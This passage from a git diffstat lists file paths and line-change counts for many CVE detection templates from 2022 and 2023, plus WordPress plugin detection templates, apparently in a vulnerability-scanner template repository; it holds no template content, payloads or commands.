| 3 +-- http/cves/2022/CVE-2022-32772.yaml | 3 +-- http/cves/2022/CVE-2022-33119.yaml | 3 +-- http/cves/2022/CVE-2022-33174.yaml | 3 +-- http/cves/2022/CVE-2022-33891.yaml | 3 +-- http/cves/2022/CVE-2022-33901.yaml | 3 +-- http/cves/2022/CVE-2022-33965.yaml | 3 +-- http/cves/2022/CVE-2022-34045.yaml | 3 +-- http/cves/2022/CVE-2022-34046.yaml | 3 +-- http/cves/2022/CVE-2022-34047.yaml | 3 +-- http/cves/2022/CVE-2022-34048.yaml | 3 +-- http/cves/2022/CVE-2022-34049.yaml | 3 +-- http/cves/2022/CVE-2022-34093.yaml | 3 +-- http/cves/2022/CVE-2022-34094.yaml | 3 +-- http/cves/2022/CVE-2022-34121.yaml | 3 +-- http/cves/2022/CVE-2022-34328.yaml | 3 +-- http/cves/2022/CVE-2022-34576.yaml | 3 +-- http/cves/2022/CVE-2022-34590.yaml | 3 +-- http/cves/2022/CVE-2022-3484.yaml | 3 +-- http/cves/2022/CVE-2022-3506.yaml | 3 +-- http/cves/2022/CVE-2022-35151.yaml | 3 +-- http/cves/2022/CVE-2022-35416.yaml | 3 +-- http/cves/2022/CVE-2022-35493.yaml | 3 +-- http/cves/2022/CVE-2022-3578.yaml | 3 +-- http/cves/2022/CVE-2022-36446.yaml | 3 +-- http/cves/2022/CVE-2022-36553.yaml | 3 +-- http/cves/2022/CVE-2022-36642.yaml | 3 +-- http/cves/2022/CVE-2022-36804.yaml | 3 +-- http/cves/2022/CVE-2022-36883.yaml | 3 +-- http/cves/2022/CVE-2022-37153.yaml | 3 +-- http/cves/2022/CVE-2022-37190.yaml | 3 +-- http/cves/2022/CVE-2022-37191.yaml | 3 +-- http/cves/2022/CVE-2022-37299.yaml | 3 +-- http/cves/2022/CVE-2022-3768.yaml | 3 +-- http/cves/2022/CVE-2022-3800.yaml | 3 +-- http/cves/2022/CVE-2022-38295.yaml | 3 +-- http/cves/2022/CVE-2022-38296.yaml | 3 +-- http/cves/2022/CVE-2022-38463.yaml | 3 +-- http/cves/2022/CVE-2022-38467.yaml | 3 +-- http/cves/2022/CVE-2022-38553.yaml | 3 +-- http/cves/2022/CVE-2022-38637.yaml | 3 +-- http/cves/2022/CVE-2022-38794.yaml | 3 +-- http/cves/2022/CVE-2022-38817.yaml | 3 +-- http/cves/2022/CVE-2022-38870.yaml | 3 +-- http/cves/2022/CVE-2022-39048.yaml | 3 +-- http/cves/2022/CVE-2022-3908.yaml | 3 +-- http/cves/2022/CVE-2022-39195.yaml | 3 +-- http/cves/2022/CVE-2022-3933.yaml | 3 +-- http/cves/2022/CVE-2022-3934.yaml | 3 +-- http/cves/2022/CVE-2022-3982.yaml | 3 +-- http/cves/2022/CVE-2022-39952.yaml | 3 +-- http/cves/2022/CVE-2022-40032.yaml | 3 +-- http/cves/2022/CVE-2022-40047.yaml | 3 +-- http/cves/2022/CVE-2022-40083.yaml | 3 +-- http/cves/2022/CVE-2022-40127.yaml | 3 +-- http/cves/2022/CVE-2022-40359.yaml | 3 +-- http/cves/2022/CVE-2022-4049.yaml | 3 +-- http/cves/2022/CVE-2022-4050.yaml | 3 +-- http/cves/2022/CVE-2022-4057.yaml | 3 +-- http/cves/2022/CVE-2022-4059.yaml | 3 +-- http/cves/2022/CVE-2022-4060.yaml | 3 +-- http/cves/2022/CVE-2022-4063.yaml | 3 +-- http/cves/2022/CVE-2022-40734.yaml | 3 +-- http/cves/2022/CVE-2022-40879.yaml | 3 +-- http/cves/2022/CVE-2022-40881.yaml | 3 +-- http/cves/2022/CVE-2022-4117.yaml | 3 +-- http/cves/2022/CVE-2022-4140.yaml | 3 +-- http/cves/2022/CVE-2022-41441.yaml | 3 +-- http/cves/2022/CVE-2022-41473.yaml | 3 +-- http/cves/2022/CVE-2022-41840.yaml | 3 +-- http/cves/2022/CVE-2022-42094.yaml | 3 +-- http/cves/2022/CVE-2022-42095.yaml | 3 +-- http/cves/2022/CVE-2022-42096.yaml | 3 +-- http/cves/2022/CVE-2022-42233.yaml | 3 +-- http/cves/2022/CVE-2022-4260.yaml | 3 +-- http/cves/2022/CVE-2022-42746.yaml | 3 +-- http/cves/2022/CVE-2022-42747.yaml | 3 +-- http/cves/2022/CVE-2022-42748.yaml | 3 +-- http/cves/2022/CVE-2022-42749.yaml | 3 +-- http/cves/2022/CVE-2022-4295.yaml | 3 +-- http/cves/2022/CVE-2022-4301.yaml | 3 +-- http/cves/2022/CVE-2022-43014.yaml | 3 +-- http/cves/2022/CVE-2022-43015.yaml | 3 +-- http/cves/2022/CVE-2022-43016.yaml | 3 +-- http/cves/2022/CVE-2022-43017.yaml | 3 +-- http/cves/2022/CVE-2022-43018.yaml | 3 +-- http/cves/2022/CVE-2022-4306.yaml | 3 +-- http/cves/2022/CVE-2022-43140.yaml | 3 +-- http/cves/2022/CVE-2022-43164.yaml | 3 +-- http/cves/2022/CVE-2022-43165.yaml | 3 +-- http/cves/2022/CVE-2022-43166.yaml | 3 +-- http/cves/2022/CVE-2022-43167.yaml | 3 +-- http/cves/2022/CVE-2022-43169.yaml | 3 +-- http/cves/2022/CVE-2022-4320.yaml | 3 +-- http/cves/2022/CVE-2022-4321.yaml | 3 +-- http/cves/2022/CVE-2022-4325.yaml | 3 +-- http/cves/2022/CVE-2022-4328.yaml | 3 +-- http/cves/2022/CVE-2022-44290.yaml | 3 +-- http/cves/2022/CVE-2022-44291.yaml | 3 +-- http/cves/2022/CVE-2022-4447.yaml | 3 +-- http/cves/2022/CVE-2022-44944.yaml | 3 +-- http/cves/2022/CVE-2022-44946.yaml | 3 +-- http/cves/2022/CVE-2022-44947.yaml | 3 +-- http/cves/2022/CVE-2022-44948.yaml | 3 +-- http/cves/2022/CVE-2022-44949.yaml | 3 +-- http/cves/2022/CVE-2022-44950.yaml | 3 +-- http/cves/2022/CVE-2022-44951.yaml | 3 +-- http/cves/2022/CVE-2022-44952.yaml | 3 +-- http/cves/2022/CVE-2022-44957.yaml | 3 +-- http/cves/2022/CVE-2022-45037.yaml | 3 +-- http/cves/2022/CVE-2022-45038.yaml | 3 +-- http/cves/2022/CVE-2022-45917.yaml | 3 +-- http/cves/2022/CVE-2022-45933.yaml | 3 +-- http/cves/2022/CVE-2022-46020.yaml | 3 +-- http/cves/2022/CVE-2022-46071.yaml | 3 +-- http/cves/2022/CVE-2022-46073.yaml | 3 +-- http/cves/2022/CVE-2022-46381.yaml | 3 +-- http/cves/2022/CVE-2022-46443.yaml | 3 +-- http/cves/2022/CVE-2022-46463.yaml | 3 +-- http/cves/2022/CVE-2022-46888.yaml | 3 +-- http/cves/2022/CVE-2022-46934.yaml | 3 +-- http/cves/2022/CVE-2022-47002.yaml | 3 +-- http/cves/2022/CVE-2022-47003.yaml | 3 +-- http/cves/2022/CVE-2022-47075.yaml | 3 +-- http/cves/2022/CVE-2022-47615.yaml | 3 +-- http/cves/2022/CVE-2022-47945.yaml | 3 +-- http/cves/2022/CVE-2022-47986.yaml | 3 +-- http/cves/2022/CVE-2022-48012.yaml | 3 +-- http/cves/2022/CVE-2022-48165.yaml | 3 +-- http/cves/2022/CVE-2022-48197.yaml | 3 +-- http/cves/2022/CVE-2022-4897.yaml | 3 +-- http/cves/2023/CVE-2023-0099.yaml | 3 +-- http/cves/2023/CVE-2023-0126.yaml | 3 +-- http/cves/2023/CVE-2023-0236.yaml | 3 +-- http/cves/2023/CVE-2023-0261.yaml | 3 +-- http/cves/2023/CVE-2023-0334.yaml | 3 +-- http/cves/2023/CVE-2023-0448.yaml | 3 +-- http/cves/2023/CVE-2023-0514.yaml | 3 +-- http/cves/2023/CVE-2023-0527.yaml | 3 +-- http/cves/2023/CVE-2023-0552.yaml | 3 +-- http/cves/2023/CVE-2023-0562.yaml | 3 +-- http/cves/2023/CVE-2023-0563.yaml | 3 +-- http/cves/2023/CVE-2023-0600.yaml | 3 +-- http/cves/2023/CVE-2023-0602.yaml | 3 +-- http/cves/2023/CVE-2023-0630.yaml | 3 +-- http/cves/2023/CVE-2023-0669.yaml | 3 +-- http/cves/2023/CVE-2023-0777.yaml | 3 +-- http/cves/2023/CVE-2023-0900.yaml | 3 +-- http/cves/2023/CVE-2023-0947.yaml | 3 +-- http/cves/2023/CVE-2023-0948.yaml | 3 +-- http/cves/2023/CVE-2023-0968.yaml | 3 +-- http/cves/2023/CVE-2023-1020.yaml | 3 +-- http/cves/2023/CVE-2023-1080.yaml | 3 +-- http/cves/2023/CVE-2023-1177.yaml | 3 +-- http/cves/2023/CVE-2023-1263.yaml | 3 +-- http/cves/2023/CVE-2023-1362.yaml | 3 +-- http/cves/2023/CVE-2023-1408.yaml | 3 +-- http/cves/2023/CVE-2023-1454.yaml | 3 +-- http/cves/2023/CVE-2023-1496.yaml | 3 +-- http/cves/2023/CVE-2023-1546.yaml | 3 +-- http/cves/2023/CVE-2023-1671.yaml | 3 +-- http/cves/2023/CVE-2023-1730.yaml | 3 +-- http/cves/2023/CVE-2023-1780.yaml | 3 +-- http/cves/2023/CVE-2023-1835.yaml | 3 +-- http/cves/2023/CVE-2023-1880.yaml | 3 +-- http/cves/2023/CVE-2023-1890.yaml | 3 +-- http/cves/2023/CVE-2023-2009.yaml | 3 +-- http/cves/2023/CVE-2023-20198.yaml | 3 ++- http/cves/2023/CVE-2023-2023.yaml | 3 +-- http/cves/2023/CVE-2023-20887.yaml | 3 +-- http/cves/2023/CVE-2023-20888.yaml | 3 +-- http/cves/2023/CVE-2023-20889.yaml | 3 +-- http/cves/2023/CVE-2023-2122.yaml | 3 +-- http/cves/2023/CVE-2023-2130.yaml | 3 +-- http/cves/2023/CVE-2023-2178.yaml | 3 +-- http/cves/2023/CVE-2023-2224.yaml | 3 +-- http/cves/2023/CVE-2023-22432.yaml | 3 +-- http/cves/2023/CVE-2023-22463.yaml | 3 +-- http/cves/2023/CVE-2023-22478.yaml | 3 +-- http/cves/2023/CVE-2023-22480.yaml | 3 +-- http/cves/2023/CVE-2023-22515.yaml | 3 +-- http/cves/2023/CVE-2023-22620.yaml | 3 +-- http/cves/2023/CVE-2023-2272.yaml | 3 +-- http/cves/2023/CVE-2023-22897.yaml | 3 +-- http/cves/2023/CVE-2023-23161.yaml | 3 +-- http/cves/2023/CVE-2023-23333.yaml | 3 +-- http/cves/2023/CVE-2023-23488.yaml | 3 +-- http/cves/2023/CVE-2023-23489.yaml | 3 +-- http/cves/2023/CVE-2023-23491.yaml | 3 +-- http/cves/2023/CVE-2023-23492.yaml | 3 +-- http/cves/2023/CVE-2023-2356.yaml | 3 +-- http/cves/2023/CVE-2023-24044.yaml | 3 +-- http/cves/2023/CVE-2023-24243.yaml | 3 +-- http/cves/2023/CVE-2023-24278.yaml | 3 +-- http/cves/2023/CVE-2023-24322.yaml | 3 +-- http/cves/2023/CVE-2023-24488.yaml | 3 +-- http/cves/2023/CVE-2023-24657.yaml | 3 +-- http/cves/2023/CVE-2023-24733.yaml | 3 +-- http/cves/2023/CVE-2023-24735.yaml | 3 +-- http/cves/2023/CVE-2023-24737.yaml | 3 +-- http/cves/2023/CVE-2023-2479.yaml | 3 +-- http/cves/2023/CVE-2023-25135.yaml | 3 +-- http/cves/2023/CVE-2023-25157.yaml | 3 +-- http/cves/2023/CVE-2023-25346.yaml | 3 +-- http/cves/2023/CVE-2023-25573.yaml | 3 +-- http/cves/2023/CVE-2023-25717.yaml | 3 +-- http/cves/2023/CVE-2023-26067.yaml | 3 +-- http/cves/2023/CVE-2023-26255.yaml | 3 +-- http/cves/2023/CVE-2023-26256.yaml | 3 +-- http/cves/2023/CVE-2023-26360.yaml | 3 +-- http/cves/2023/CVE-2023-26469.yaml | 3 +-- http/cves/2023/CVE-2023-2648.yaml | 3 +-- http/cves/2023/CVE-2023-26842.yaml | 3 +-- http/cves/2023/CVE-2023-26843.yaml | 3 +-- http/cves/2023/CVE-2023-27008.yaml | 3 +-- http/cves/2023/CVE-2023-27034.yaml | 3 +-- http/cves/2023/CVE-2023-27159.yaml | 3 +-- http/cves/2023/CVE-2023-27179.yaml | 3 +-- http/cves/2023/CVE-2023-27292.yaml | 3 +-- http/cves/2023/CVE-2023-2732.yaml | 3 +-- http/cves/2023/CVE-2023-27482.yaml | 3 +-- http/cves/2023/CVE-2023-27524.yaml | 3 +-- http/cves/2023/CVE-2023-27587.yaml | 3 +-- http/cves/2023/CVE-2023-2766.yaml | 3 +-- http/cves/2023/CVE-2023-2779.yaml | 3 +-- http/cves/2023/CVE-2023-2780.yaml | 3 +-- http/cves/2023/CVE-2023-27922.yaml | 3 +-- http/cves/2023/CVE-2023-2796.yaml | 3 +-- http/cves/2023/CVE-2023-2813.yaml | 3 +-- http/cves/2023/CVE-2023-2822.yaml | 3 +-- http/cves/2023/CVE-2023-2825.yaml | 3 +-- http/cves/2023/CVE-2023-28432.yaml | 3 +-- http/cves/2023/CVE-2023-28665.yaml | 3 +-- http/cves/2023/CVE-2023-29298.yaml | 3 +-- http/cves/2023/CVE-2023-29300.yaml | 3 +-- http/cves/2023/CVE-2023-29357.yaml | 3 +-- http/cves/2023/CVE-2023-29439.yaml | 3 +-- http/cves/2023/CVE-2023-29489.yaml | 3 +-- http/cves/2023/CVE-2023-29622.yaml | 3 +-- http/cves/2023/CVE-2023-29623.yaml | 3 +-- http/cves/2023/CVE-2023-2982.yaml | 3 +-- http/cves/2023/CVE-2023-29887.yaml | 3 +-- http/cves/2023/CVE-2023-29919.yaml | 3 +-- http/cves/2023/CVE-2023-29922.yaml | 3 +-- http/cves/2023/CVE-2023-29923.yaml | 3 +-- http/cves/2023/CVE-2023-30019.yaml | 3 +-- http/cves/2023/CVE-2023-30150.yaml | 3 +-- http/cves/2023/CVE-2023-30210.yaml | 3 +-- http/cves/2023/CVE-2023-30212.yaml | 3 +-- http/cves/2023/CVE-2023-30256.yaml | 3 +-- http/cves/2023/CVE-2023-30777.yaml | 3 +-- http/cves/2023/CVE-2023-30868.yaml | 3 +-- http/cves/2023/CVE-2023-30943.yaml | 3 +-- http/cves/2023/CVE-2023-31059.yaml | 3 +-- http/cves/2023/CVE-2023-31465.yaml | 3 +-- http/cves/2023/CVE-2023-31548.yaml | 3 +-- http/cves/2023/CVE-2023-3219.yaml | 3 +-- http/cves/2023/CVE-2023-32235.yaml | 3 +-- http/cves/2023/CVE-2023-32243.yaml | 3 +-- http/cves/2023/CVE-2023-32315.yaml | 3 +-- http/cves/2023/CVE-2023-33338.yaml | 3 +-- http/cves/2023/CVE-2023-33405.yaml | 3 +-- http/cves/2023/CVE-2023-33439.yaml | 3 +-- http/cves/2023/CVE-2023-33440.yaml | 3 +-- http/cves/2023/CVE-2023-3345.yaml | 3 +-- http/cves/2023/CVE-2023-33510.yaml | 3 +-- http/cves/2023/CVE-2023-33584.yaml | 3 +-- http/cves/2023/CVE-2023-33831.yaml | 3 +-- http/cves/2023/CVE-2023-34124.yaml | 3 +-- http/cves/2023/CVE-2023-34192.yaml | 3 +-- http/cves/2023/CVE-2023-34362.yaml | 3 +-- http/cves/2023/CVE-2023-34537.yaml | 3 +-- http/cves/2023/CVE-2023-34598.yaml | 3 +-- http/cves/2023/CVE-2023-34599.yaml | 3 +-- http/cves/2023/CVE-2023-3460.yaml | 3 +-- http/cves/2023/CVE-2023-34659.yaml | 3 +-- http/cves/2023/CVE-2023-34751.yaml | 3 +-- http/cves/2023/CVE-2023-34752.yaml | 3 +-- http/cves/2023/CVE-2023-34753.yaml | 3 +-- http/cves/2023/CVE-2023-34755.yaml | 3 +-- http/cves/2023/CVE-2023-34756.yaml | 3 +-- http/cves/2023/CVE-2023-3479.yaml | 3 +-- http/cves/2023/CVE-2023-34843.yaml | 3 +-- http/cves/2023/CVE-2023-35078.yaml | 3 +-- http/cves/2023/CVE-2023-35082.yaml | 3 +-- http/cves/2023/CVE-2023-35813.yaml | 3 +-- http/cves/2023/CVE-2023-35843.yaml | 3 +-- http/cves/2023/CVE-2023-35844.yaml | 3 +-- http/cves/2023/CVE-2023-35885.yaml | 3 +-- http/cves/2023/CVE-2023-36287.yaml | 3 +-- http/cves/2023/CVE-2023-36289.yaml | 3 +-- http/cves/2023/CVE-2023-36346.yaml | 3 +-- http/cves/2023/CVE-2023-36844.yaml | 3 +-- http/cves/2023/CVE-2023-36845.yaml | 3 +-- http/cves/2023/CVE-2023-36934.yaml | 3 +-- http/cves/2023/CVE-2023-37265.yaml | 3 +-- http/cves/2023/CVE-2023-37266.yaml | 3 +-- http/cves/2023/CVE-2023-37270.yaml | 3 +-- http/cves/2023/CVE-2023-37462.yaml | 3 +-- http/cves/2023/CVE-2023-37580.yaml | 3 +-- http/cves/2023/CVE-2023-37629.yaml | 3 +-- http/cves/2023/CVE-2023-3765.yaml | 3 +-- http/cves/2023/CVE-2023-37679.yaml | 3 +-- http/cves/2023/CVE-2023-37728.yaml | 3 +-- http/cves/2023/CVE-2023-37979.yaml | 3 +-- http/cves/2023/CVE-2023-3836.yaml | 3 +-- http/cves/2023/CVE-2023-3843.yaml | 3 +-- http/cves/2023/CVE-2023-38433.yaml | 3 +-- http/cves/2023/CVE-2023-3844.yaml | 3 +-- http/cves/2023/CVE-2023-3845.yaml | 3 +-- http/cves/2023/CVE-2023-3846.yaml | 3 +-- http/cves/2023/CVE-2023-3847.yaml | 3 +-- http/cves/2023/CVE-2023-3848.yaml | 3 +-- http/cves/2023/CVE-2023-3849.yaml | 3 +-- http/cves/2023/CVE-2023-38501.yaml | 3 +-- http/cves/2023/CVE-2023-39026.yaml | 3 +-- http/cves/2023/CVE-2023-39108.yaml | 3 +-- http/cves/2023/CVE-2023-39109.yaml | 3 +-- http/cves/2023/CVE-2023-39110.yaml | 3 +-- http/cves/2023/CVE-2023-39141.yaml | 3 +-- http/cves/2023/CVE-2023-39143.yaml | 3 +-- http/cves/2023/CVE-2023-3936.yaml | 3 +-- http/cves/2023/CVE-2023-39361.yaml | 3 +-- http/cves/2023/CVE-2023-39598.yaml | 3 +-- http/cves/2023/CVE-2023-39600.yaml | 3 +-- http/cves/2023/CVE-2023-39676.yaml | 3 +-- http/cves/2023/CVE-2023-39677.yaml | 3 +-- http/cves/2023/CVE-2023-39700.yaml | 3 +-- http/cves/2023/CVE-2023-40208.yaml | 3 +-- http/cves/2023/CVE-2023-40779.yaml | 3 +-- http/cves/2023/CVE-2023-4110.yaml | 3 +-- http/cves/2023/CVE-2023-4111.yaml | 3 +-- http/cves/2023/CVE-2023-4112.yaml | 3 +-- http/cves/2023/CVE-2023-4113.yaml | 3 +-- http/cves/2023/CVE-2023-4114.yaml | 3 +-- http/cves/2023/CVE-2023-4115.yaml | 3 +-- http/cves/2023/CVE-2023-4116.yaml | 3 +-- http/cves/2023/CVE-2023-4148.yaml | 3 +-- http/cves/2023/CVE-2023-41538.yaml | 3 +-- http/cves/2023/CVE-2023-4168.yaml | 3 +-- http/cves/2023/CVE-2023-4173.yaml | 3 +-- http/cves/2023/CVE-2023-4174.yaml | 3 +-- http/cves/2023/CVE-2023-42442.yaml | 3 +-- http/cves/2023/CVE-2023-43261.yaml | 3 +-- http/cves/2023/CVE-2023-4451.yaml | 3 +-- http/cves/2023/CVE-2023-4568.yaml | 3 +-- http/cves/2023/CVE-2023-45852.yaml | 3 +-- http/cves/2023/CVE-2023-4634.yaml | 3 +-- http/cves/2023/CVE-2023-46747.yaml | 3 +-- http/cves/2023/CVE-2023-4714.yaml | 3 +-- http/cves/2023/CVE-2023-4966.yaml | 3 +-- http/cves/2023/CVE-2023-4974.yaml | 3 +-- http/cves/2023/CVE-2023-5244.yaml | 3 +-- http/exposed-panels/overseerr-panel.yaml | 3 +-- http/exposed-panels/plausible-panel.yaml | 3 +-- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + 